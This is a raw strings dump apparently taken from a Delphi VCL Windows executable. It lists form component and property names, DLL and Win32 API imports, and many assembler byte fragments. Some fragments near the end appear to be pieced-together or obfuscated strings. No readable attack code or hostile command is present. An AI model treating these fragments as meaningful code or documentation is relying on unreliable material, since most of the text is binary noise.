FilterIndex
InitialDir
Options
OptionsEx
Title
OnCanClose
OnFolderChange
OnSelectionChange
OnTypeChange }B
OnIncludeItemSVW
_^[Y]
_^[Y]
;Ght4
FileEditStyle
8Z|03
@\@t*U
u"Vh_
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
TImage
TImage
ExtCtrls
Align
Anchors
AutoSize
Centerp
Constraints
DragCursor$
DragKind
DragMode
Enabled
IncrementalDisplay
ParentShowHint
PopupMenu
Proportional
ShowHint
Stretch
Transparent
Visible
OnClickT
OnContextPopup
OnDblClick
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag,
OnMouseDown
OnMouseMove,
OnMouseUp
OnProgress
OnStartDockx
OnStartDrag
TTimer
TTimer
ExtCtrls
Enabled|
Interval
OnTimer
TCustomPanel
TCustomPanel
ExtCtrls
TPanel
TPanel
ExtCtrls7
AlignH
Alignment
Anchors
AutoSize\
BevelInner\
BevelOuterD
BevelWidth
BorderWidth
BorderStylep
CaptionX
Colorp
Constraints
Ctl3D
UseDockManager
DockSite
DragCursor$
DragKind
DragMode
Enabled
FullRepaint
Locked
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ShowHintX
TabOrder
TabStop
VisibleX
OnCanResize
OnClick
OnConstrainedResizeT
OnContextPopup
OnDockDrop
OnDockOver
OnDblClick
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnEnter
OnExit
OnGetSiteInfo,
OnMouseDown
OnMouseMove,
OnMouseUp
OnResize
OnStartDockx
OnStartDrag
OnUnDock
TCustomRadioGroup
TCustomRadioGroup
ExtCtrls
TRadioGroup
TRadioGroup0
ExtCtrls$
Align
Anchors
BiDiModep
CaptionX
Color<
Columns
Ctl3D
DragCursor$
DragKind
DragMode
Enabled
Font<
ItemIndex
Itemsp
Constraints
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ShowHintX
TabOrder
TabStop
Visible
OnClickT
OnContextPopup
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnEnter
OnExit
OnStartDockx
OnStartDrag
NaturalNumber
TCanResizeEvent
Sender
TObject
NewSize
Integer
Accept
Boolean
TResizeStyle
rsNone
rsLine
rsUpdate
rsPattern
ExtCtrls
TSplitter
TSplitterH
ExtCtrls
Align
AutoSnap
BeveledX
Color
Cursorp
Constraints<
MinSize
ParentColor
ResizeStyle
Visible<
WidthX
OnCanResize
OnMoved
OnPaint
_^[Y]
_^[Y]
TGroupButton
TGroupButton
ExtCtrls
_^[Y]
_^[YY]
QdGNu
Delphi Picture
Delphi Component
TButtonLayout
blGlyphLeft
blGlyphRight
blGlyphTop
blGlyphBottom
Buttons
TNumGlyphs
TSpeedButtonActionLink
TSpeedButton
TSpeedButton
Buttons
Action
AllowAllUp
Anchors
BiDiModep
Constraints<
GroupIndex
Downp
Caption
Enabled
Glyph,
Layout<
Margin
NumGlyphs
ParentFont
ParentShowHint
PopupMenu
ShowHint<
Spacing
Transparent
Visible
OnClick
OnDblClick,
OnMouseDown
OnMouseMove,
OnMouseUp
TGlyphList
TGlyphList
Buttons
TGlyphCache8
TButtonGlyph
SVWUQ
Z]_^[
_^[Y]
_^[Y]
Y^[Y]
TOpenPictureDialog
TOpenPictureDialog
ExtDlgs
Filter
TSavePictureDialog
TSavePictureDialog
ExtDlgs
TSilentPaintPanel
TSilentPaintPanel
ExtDlgs
_^[YY]
_^[YY]
PicturePanel
PictureLabel
PreviewButton
PREVIEWGLYPH
PaintPanel
PaintBox
DLGTEMPLATE
_^[YY]
PreviewForm
Panel
Image
DLGTEMPLATE
MAPI32.DLL
TConversion
TConversionFormat
TCoolBand
TCoolBand
ComCtrls
Bitmap
BorderStyle
BreakX
ColorH
Control
FixedBackground
FixedSize
HorizontalOnlyh
ImageIndex<
MinHeight<
MinWidth
ParentColor
ParentBitmap
Visible<
Width
TCoolBands
TCoolBands
ComCtrls
TCoolBandMaximize
bmNone
bmClick
bmDblClick
ComCtrls
TCoolBar
TCoolBar
ComCtrls1
Align
Anchors
AutoSize
BandBorderStyleX
BandMaximize0
BorderWidthX
Colorp
Constraints
Ctl3D
DockSite
DragCursor$
DragKind
DragMode
EdgeBorders0sB
EdgeInner0sB
EdgeOuter
Enabled
FixedSize
FixedOrder
Font0
Images
ParentColor
ParentFont
ParentShowHint
PopupMenu
ShowHint
ShowText
Vertical
Visible
OnChange
OnClickT
OnContextPopup
OnDblClick
OnDockDrop
OnDockOver
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnGetSiteInfo,
OnMouseDown
OnMouseMove,
OnMouseUp
OnResize
OnStartDockx
OnStartDrag
OnUnDock
comctl32.dll
_^[Y]
;s(tT
ReBarWindow32
Uhm"C
UhD$C
Uh!&C
Uhu%C
Uhk*C
Uh+/C
_^[YY]
Uh>3C
|]_^[
R|^Y]
_^[YY]
_^[Y]
Uh7=C
TThemeServices
Theme manager
2001, 2002 Mike Lischke
^[YY]
!"#$%
Uh_IC
TCustomGroupBox
TCustomGroupBox
StdCtrls
TTextLayout
tlTop
tlCenter
tlBottom
StdCtrls
TCustomLabel
TCustomLabellKC
StdCtrls
TLabel
TLabel
StdCtrls'
AlignH
Alignment
Anchors
AutoSize
BiDiModep
CaptionX
Colorp
Constraints
DragCursor$
DragKind
DragMode
EnabledH
FocusControl
ParentBiDiMode
ParentColor
ParentFont
PopupMenu
ShowAccelChar
ShowHint
Transparent
Layout
Visible
WordWrap
OnClickT
OnContextPopup
OnDblClick
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag,
OnMouseDown
OnMouseMove,
OnMouseUp
OnMouseEnter
OnMouseLeave
OnStartDockx
OnStartDrag
TDrawItemEvent
Control
TWinControl
Index
Integer
TRect
State
TOwnerDrawState
TMeasureItemEvent
Control
TWinControl
Index
Integer
Height
Integer
TButtonActionLink
TButtonControl
TButtonControl
StdCtrls
TRadioButton
TRadioButton`VC
StdCtrls*
Action
Alignment
Anchors
BiDiModep
Caption
CheckedX
Colorp
Constraints
Ctl3D
DragCursor$
DragKind
DragMode
Enabled
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ShowHintX
TabOrder
TabStop
Visible
WordWrap
OnClickT
OnContextPopup
OnDblClick
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnEnter
OnExit
OnKeyDownT
OnKeyPress
OnKeyUp,
OnMouseDown
OnMouseMove,
OnMouseUp
OnStartDockx
OnStartDrag
TListBoxStyle
lbStandard
lbOwnerDrawFixed
lbOwnerDrawVariable
lbVirtual
lbVirtualOwnerDraw
StdCtrls
TLBGetDataEvent
Control
TWinControl
Index
Integer
String
TLBGetDataObjectEvent
Control
TWinControl
Index
Integer
DataObject
TObject
TLBFindDataEvent
Control
TWinControl
FindString
String
Integer<
TCustomListBox
TCustomListBox8_C
StdCtrls
TabStop
TListBoxStrings
TListBoxStrings\aC
StdCtrls
_^[Y]
UhbiC
_^[Y]
CL+D$
CL+D$
GH+D$
UhQmC
_^[Y]
Z:Pit
UhZnC
_^[YY]
BUTTON
UhMsC
_^[Y]
UhltC
_^[YY]
_^[YY]
UhEvC
_^[YY]
_^[YY]
UhPxC
Uh.xC
_^[YY]
QQQQQQSVW
@YZ^[
YZ_^[
(]_^[
!G$_^[
LISTBOX
YZ]_^[
THintAction
THintActionL
StdActns
TWinHelpViewer
_^[YY]
_^[YY]
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
_^[Y]
JumpID("","%s")
_^[YY]
_^[Y]
MS_WINHELP
#32770
TCursor
TAlign
alNone
alTop
alBottom
alLeft
alRight
alClient
alCustom
Controls
TDragObject|
TDragObjectH
Controls
TBaseDragControlObject
TBaseDragControlObject
Controls
TDragControlObject
TDragControlObjectEx
TDragDockObject
TDragDockObject
Controls
TDragDockObjectEx
TControlCanvas
TControlCanvas,
Controls
TControlActionLink
TMouseButton
mbLeft
mbRight
mbMiddle
Controls
TDragMode
dmManual
dmAutomatic
Controls
TDragState
dsDragEnter
dsDragLeave
dsDragMove
Controls
TDragKind
dkDrag
dkDock
Controls
TTabOrder
TCaption
TAnchorKind
akLeft
akTop
akRight
akBottom
Controls
TAnchors
TConstraintSize
TSizeConstraints
TSizeConstraintsH
Controls
MaxHeight
MaxWidth
MinHeight
MinWidth
TMouseEvent
Sender
TObject
Button
TMouseButton
Shift
TShiftState
Integer
Integer
TMouseMoveEvent
Sender
TObject
Shift
TShiftState
Integer
Integer
TKeyEvent
Sender
TObject
Shift
TShiftState
TKeyPressEvent
Sender
TObject
TDragOverEvent
Sender
TObject
Source
TObject
Integer
Integer
State
TDragState
Accept
Boolean
TDragDropEvent
Sender
TObject
Source
TObject
Integer
Integer
TStartDragEvent
Sender
TObject
DragObject
TDragObject
TEndDragEvent
Sender
TObject
Target
TObject
Integer
Integer
TDockDropEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDockOverEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
State
TDragState
Accept
Boolean
TUnDockEvent
Sender
TObject
Client
TControl
NewTarget
TWinControl
Allow
Boolean
TStartDockEvent
Sender
TObject
DragObject
TDragDockObject
TGetSiteInfoEvent
Sender
TObject
DockClient
TControl
InfluenceRect
TRect
MousePos
TPoint
CanDock
Boolean
TCanResizeEvent
Sender
TObject
NewWidth
Integer
NewHeight
Integer
Resize
Boolean
TConstrainedResizeEvent
Sender
TObject
MinWidth
Integer
MinHeight
Integer
MaxWidth
Integer
MaxHeight
Integer
TMouseWheelEvent
Sender
TObject
Shift
TShiftState
WheelDelta
Integer
MousePos
TPoint
Handled
Boolean
TMouseWheelUpDownEvent
Sender
TObject
Shift
TShiftState
MousePos
TPoint
Handled
Boolean
TContextPopupEvent
Sender
TObject
MousePos
TPoint
Handled
Boolean
TControl
TControl
Controls
Left<
Width<
Height
Cursor
HelpType
HelpKeyword
HelpContext
TWinControlActionLink
TImeMode
imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata
imChinese
imSHanguel
imHanguel
Controls
TImeName
TBorderWidth
TBevelCut
bvNone
bvLowered
bvRaised
bvSpace
Controls
TBevelEdge
beLeft
beTop
beRight
beBottom
Controls
TBevelEdges
TBevelKind
bkNone
bkTile
bkSoft
bkFlat
Controls
TBevelWidth
IDockManager
Controls
TWinControl
TWinControl
Controls
TGraphicControlh
TGraphicControl
Controls
TCustomControl
TCustomControl
Controls
THintWindow
THintWindow8
Controls
TDragImageList
TDragImageList
Controls
TImageList
TImageList
Controls
BlendColorX
BkColor<
AllocBy
DrawingStyle<
Height4
ImageType
Masked
OnChange
ShareImages<
Width
TDockZone
TDockTree
TMouse
TCustomListControl
TCustomListControl
Controls
TCustomMultiSelectListControl
TCustomMultiSelectListControlD
Controls
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
TSiteList
_^[YY]
tPHt8
_^[Y]
S$_^[]
;B0t'
;B8t=
CQ tA
YZ_^[
YZ]_^[
YZ_^[
t%Jt?Jt[
%s (%s)
Z:Pjt
YZ]_^[
$:Cat
u$;~|u
;CLtX3
Qh_^[
YZ_^[
YZ_^[
V:P\t
GP t;
_^[YY]
CH+D$
CL+D$
;s0t=;
:_Wt+
f;Pxt
KHQRP
Ht7Ht
IsControl
_^[YY]
YZ_^[
_^[YY]
_^[Y]
8]_^[
,]_^[
YZ_^[
^[YY]
Uh$!D
RD;PD
Uhm%D
:_[up
Uh{)D
Uh}*D
Uhs+D
SVWUQ
Z]_^[
C$PVj
C$_^[
Uhi2D
:GauOFKu
_^[Y]
DesignSize
Uh15D
_^[YY]
_^[Y]
t2HtY
]_^[
UhSID
_^[Y]
_^[Y]
$Z_^[
_^[YY]
UhtMD
_^[Y]
UhFND
^[YY]
SVWUQ
Z]_^[
SVWUQ
Z]_^[
SVWUQ
Z]_^[
_^[YY]
;XDt#
SVWUQ
Z]_^[
t&j7j
YZ]_^[
YZ]_^[
YZ]_^[
t4VS
R|FOu
YZ]_^[
^[YY]
S8_^[]
UhjkD
+CH+E
+SL+U
UhgmD
UhotD
UhLtD
UhUvD
Uh[wD
UhAyD
_^[Y]
Uh|{D
f;Pht
_^[Y]
t9;wlt4
YZ_^[
;Bdt*
;Bh|3
R|_^[
^dVhp
^dVhp
_^[Y]
Y_^[]
Y[YY]
t$;C8u
QQQQSVW
;Fdu;
^[YY]
Q8FKu
;Xdt>
t#;^dt
YZ_^[
Y_^[]
^[YY]
+W$;U
+G$;E
_^[Y]
BP_^[]
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
YZ_^[
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
TContainedAction
TContainedAction8
ActnList
Category
TCustomActionList
TCustomActionList\
ActnList
TShortCutList
TShortCutList8
ActnList
TCustomAction
TCustomActionT
ActnList
TActionLinkSV
^[YY]
u*;~8u
R0GNu
SVWUQ
Z]_^[
QLGNu
R0Z_^[
QPFOu
_^[Y]
$:Cjt_
QTGNu
R0Z_^[
Q`FOu
R0]_^[
$;Ctt?
Q\GNu
R0Z_^[
QhGNu
R0Z_^[
QlGNu
R0Z_^[
SVWQf
QpGNu
R0Z_^[
QtFOu
R0]_^[
SVWUQ
$Z]_^[
TChangeLink
TDrawingStyle
dsFocus
dsSelected
dsNormal
dsTransparent
ImgList
TImageType
itImage
itMask
ImgListl
TImageIndex
TCustomImageList
TCustomImageList
ImgList
;V4t8
;V0t8
Rd_^[
s8VV3
S0_^[]
R ;C0|
R,;C4}!
S`]_^[
Bitmap
_^[Y]
comctl32.dll
comctl32.dll
ImageList_WriteEx
EMenuError
TMenuBreak
mbNone
mbBreak
mbBarBreak
Menus
TMenuChangeEvent
Sender
TObject
Source
TMenuItem
Rebuild
Boolean
TMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
ARect
TRect
Selected
Boolean
TAdvancedMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
ARect
TRect
State
TOwnerDrawState
TMenuMeasureItemEvent
Sender
TObject
ACanvas
TCanvas
Width
Integer
Height
Integer
TMenuItemAutoFlag
maAutomatic
maManual
maParent
Menus
TMenuAutoFlag
Menus
TMenuActionLink
TMenuItem
TMenuItem
Menus
Action
AutoCheck`
AutoHotkeys`
AutoLineReduction
Bitmapt
Break
Caption
Checked0
SubMenuImages
Default
EnabledT
GroupIndex
HelpContext
Hinth
ImageIndex
RadioItem
ShortCut
Visible
OnClick
OnDrawItemx
OnAdvancedDrawItem
OnMeasureItem
TMenu
TMenu
Menus
Items
TMainMenu
TMainMenu
Menus
AutoHotkeys
AutoLineReduction
AutoMerge
BiDiMode0
Images
OwnerDraw
ParentBiDiMode
OnChange
TPopupAlignment
paLeft
paRight
paCenter
Menus
TTrackButton
tbRightButton
tbLeftButton
Menus$
TMenuAnimations
maLeftToRight
maRightToLeft
maTopToBottom
maBottomToTop
maNone
Menus
TMenuAnimation
TPopupMenu
TPopupMenu
Menus
Alignment
AutoHotkeys
AutoLineReduction
AutoPopup
BiDiMode
HelpContext0
Images
MenuAnimation
OwnerDraw
ParentBiDiMode
TrackButton
OnChange
OnPopup
TPopupList
TMenuItemStack
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
_^[YY]
f;B`t
CPPVj
Q<]_^[
SVWUQ
:X?s&
X?ENu
Z]_^[
ShortCutText
_^[Y]
_^[Y]
P?:S?u
:^8tB
:^9tg
Q<_^[
:^?t1
f;P`t
:]:tJ
Q<]_^[
@?:F?v
Q<]_^[
Q<_^[
W<CNu
Uhh)E
SpFOu
$YZ]_^[
_^[Y]
_^[Y]
SVWUQ
Z]_^[
Uhi0E
_^[YY]
Uhk1E
S0^[]
_^[Y]
_^[Y]
Ih;J4u
_^[Y]
UhU?E
Uh0?E
Sh`:E
YZ]_^[
S0_^[
S<&uO
^[YY]
TScrollBarInc
TScrollBarStyle
ssRegular
ssFlat
ssHotTrack
Forms
TControlScrollBar
TControlScrollBar
Forms
ButtonSizeX
ColorXFE
Incrementh
Margin
ParentColor<
Position<
Range
Smooth<
SizetFE
Style<
ThumbSize
Tracking
Visible
TWindowState
wsNormal
wsMinimized
wsMaximized
Forms
TScrollingWinControl
TScrollingWinControl
Forms
HorzScrollBar$GE
VertScrollBar0KE
TFormBorderStyle
bsNone
bsSingle
bsSizeable
bsDialog
bsToolWindow
bsSizeToolWin
Forms
TBorderStyle
Forms
IDesignerHookh%A
Forms
IOleForm
Forms
TFormStyle
fsNormal
fsMDIChild
fsMDIForm
fsStayOnTop
Forms
TBorderIcon
biSystemMenu
biMinimize
biMaximize
biHelp
Forms
TBorderIcons
TPosition
poDesigned
poDefault
poDefaultPosOnly
poDefaultSizeOnly
poScreenCenter
poDesktopCenter
poMainFormCenter
poOwnerFormCenter
FormsxME
TDefaultMonitor
dmDesktop
dmPrimary
dmMainForm
dmActiveForm
Forms
TPrintScale
poNone
poProportional
poPrintToFit
Forms
TCloseAction
caNone
caHide
caFree
caMinimize
Forms
TCloseEvent
Sender
TObject
Action
TCloseAction
TCloseQueryEvent
Sender
TObject
CanClose
Boolean
TShortCutEvent
TWMKey
Handled
Boolean
THelpEvent
Command
Integer
CallHelp
Boolean
Boolean
TCustomForm
TCustomForm
Forms
TForm
TForm
FormsU
ActionH
ActiveControl
Align
AlphaBlendT
AlphaBlendValue
Anchors
AutoScroll
AutoSize
BiDiMode
BorderIcons,KE
BorderWidthp
Caption<
ClientHeight<
ClientWidthX
Color
TransparentColorX
TransparentColorValuep
Constraints
Ctl3D
UseDockManagertME
DefaultMonitor
DockSite$
DragKind
DragMode
Enabled
ParentFont
Font LE
FormStyle<
Height
HelpFile$GE
HorzScrollBar
KeyPreviewT
OldCreateOrder
ObjectMenuItem
ParentBiDiMode<
PopupMenu
Position
PrintScale
Scaled
ScreenSnap
ShowHint<
SnapBuffer$GE
VertScrollBar
Visible<
Width
WindowState
WindowMenu
OnActivateX
OnCanResize
OnClickXNE
OnClose
OnCloseQuery
OnConstrainedResizeT
OnContextPopup
OnCreate
OnDblClick
OnDestroy
OnDeactivate
OnDockDrop
OnDockOver
OnDragDrop
OnDragOver
OnEndDock
OnGetSiteInfo
OnHide
OnHelp
OnKeyDownT
OnKeyPress
OnKeyUp,
OnMouseDown
OnMouseMove,
OnMouseUpX
OnMouseWheel
OnMouseWheelDown
OnMouseWheelUp
OnPaint
OnResize
OnShortCut
OnShow
OnStartDock
OnUnDock
TCustomDockForm
TCustomDockFormh`E
Forms
PixelsPerInch
TMonitor
TScreen
TScreen
Forms
TApplication
TApplicationpcE
Forms
Uh\eE
t:GNu
^[YY]
UhMiE
;S$t6
;S0t6
Uh,wE
]_^[
UhV{E
Uht~E
UhT~E
_^[Y]
_^[Y]
PixelsPerInch
TextHeight
IgnoreFontProperty
_^[YY]
S,_^[]
SVWUQ
$Z]_^[
;Cpu'
F(Z_^[
MDICLIENT
_^[Y]
_^[Y]
;ADti
f#CTf
_^[Y]
_^[YY]
t"GNu
$Z_^[
_^[YY]
_^[Y]
Y_^[]
_^[Y]
_^[Y]
_^[YY]
Ch;Ctt
Cd;Cpt
C\_^[
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
f;sDtsf
PWj W
CHYZ]_^[
RD;PD
_^[YY]
TApplication
MAINICON
XD;PHu
sx;P`u
;B0uGj
_^[YY]
vcltest3.dll
RegisterAutomation
SVWUQ
$Z]_^[
~D_^[Y]
_^[Y]
_^[Y]
_^[Y]
;{HtK
YZ_^[
Y_^[Y]
;^`u0
]_^[
^[YY]
YZ]_^[
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
TCheckListBox
TCheckListBox
OnClickCheck
Align
AllowGrayed
Anchors
AutoComplete
BevelEdges\
BevelInner\
BevelOuter
BevelKindD
BevelWidth
BiDiMode
BorderStyleX
Color<
Columnsp
Constraints
Ctl3D
DragCursor$
DragKind
DragMode
Enabled
FontX
HeaderColorX
HeaderBackgroundColor
ImeMode0
ImeName
IntegralHeight<
ItemHeight
Items
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ShowHint
Sorted`]C
StyleX
TabOrder
TabStop<
TabWidth
Visible
OnClickT
OnContextPopup
OnData
OnDataFind0^C
OnDataObject
OnDblClick
OnDragDrop
OnDragOver
OnDrawItem
OnEndDock
OnEndDrag
OnEnter
OnExit
OnKeyDownT
OnKeyPress
OnKeyUphSC
OnMeasureItem,
OnMouseDown
OnMouseMove,
OnMouseUp
OnStartDockx
OnStartDrag
TCheckListBoxDataWrapper
SVWUQ
Z]_^[
Panel1
RadioGroup1
Label1
PopupMenu1
CoolBar1
Splitter1
CheckListBox1
SavePictureDialog1
TForm1
TForm1
Unit1
FileTimeToSystemTime
kernel32
UhM%F
ELF.EX
Uh;&F
Error
Runtime error at 00000000
0123456789ABCDEF
MS Sans Serif
h3QgjW
Oh87>
OSVWj?_jr
joZj,f
Xj.^%ef
_j#Zf
jiZj!f
W%sXja)
f9K"@
PWWjoWWWW
4j"Xjs
Y%dXjr)
joX%pf
jaX%vf
PSSjUS
PVVjoVVV
HhhAh[S
t*SSV
hhAh[S
OhIH8YSV
Oj:Xj
hX7xkW
u<erf
h'A'[W
jmXj%f
V%\Xjd)
Xjs^)
%vXjm)
X%oZju)
X%.Yjy)
VMKV)
j"Y%%
Oj0Yd
j+Xjwf
js^j8
OjoXj?f
j\X%nf
PVVjoVVV
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WriteFile
WaitForSingleObjectEx
WaitForSingleObject
VirtualQuery
VirtualAlloc
Sleep
SizeofResource
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetSystemTimeAsFileTime
GetSystemTime
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileAttributesA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitThread
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SelectClipRgn
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
Polyline
PlayEnhMetaFile
PathToRegion
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipRgn
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExcludeClipRect
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreateRectRgn
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OffsetRect
OemToCharA
MessageBoxA
MapWindowPoints
MapVirtualKeyA
LockWindowUpdate
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMessagePos
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDlgItem
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EndDeferWindowPos
EnableWindow
EnableScrollBar
EnableMenuItem
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DeferWindowPos
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
BeginDeferWindowPos
CharNextA
CharLowerBuffA
CharLowerA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Replace
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
InitCommonControls
comdlg32.dll
GetSaveFileNameA
GetOpenFileNameA
0(0<0T0h0|0
1e1i1m1
2&2.262>2F2N2V2^2f2n2v2~2
323:3B3J3R3Z3b3j3s3
6_6r6
6,7m7
:!:+:5:?:U:[:i:|:
;';.;8;B;L;X;c;t;z;
<&<f<|<
=3>@>s>y>
>P?X?
0r0x0
1'1/1b1
2%2.2L2R2Z2
363Z3b3h3n3
4e4p4y4
5$5+555
6#6/676
7$7=7
8F:N:
>$>5>A>
1#1:1O1
606>6R6
7<7E7w7
9=9D9d9
:K;s;z;
;'<<<
>)>3>;>A>O>j>
>R?[?
0Y2w2
5i5z5
<+<2<6<<<@<F<M<Q<k<t<}<
=2=\=j=o=
>*>w>
>X?n?v?~?
0&0.060>0F0N0V0^0f0n0v0~0
1&1.161>1F1N1V1^1f1n1v1~1
